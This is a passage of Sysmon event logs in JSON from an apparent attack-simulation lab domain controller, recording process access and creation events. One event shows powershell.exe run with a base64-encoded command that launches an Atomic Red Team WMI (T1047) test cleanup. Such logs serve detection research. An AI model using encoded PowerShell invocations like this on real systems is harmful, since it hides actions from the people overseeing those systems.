C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010BE2D0900}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010BE2D0900}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010BE2D0900}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.434\r\nProcessGuid: {41C8662E-20D9-5F25-0000-0010CD2E0900}\r\nProcessId: 2672\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.434","ProcessGuid":"{41C8662E-20D9-5F25-0000-0010CD2E0900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010CD2E0900}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010CD2E0900}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010CD2E0900}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010CD2E0900}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 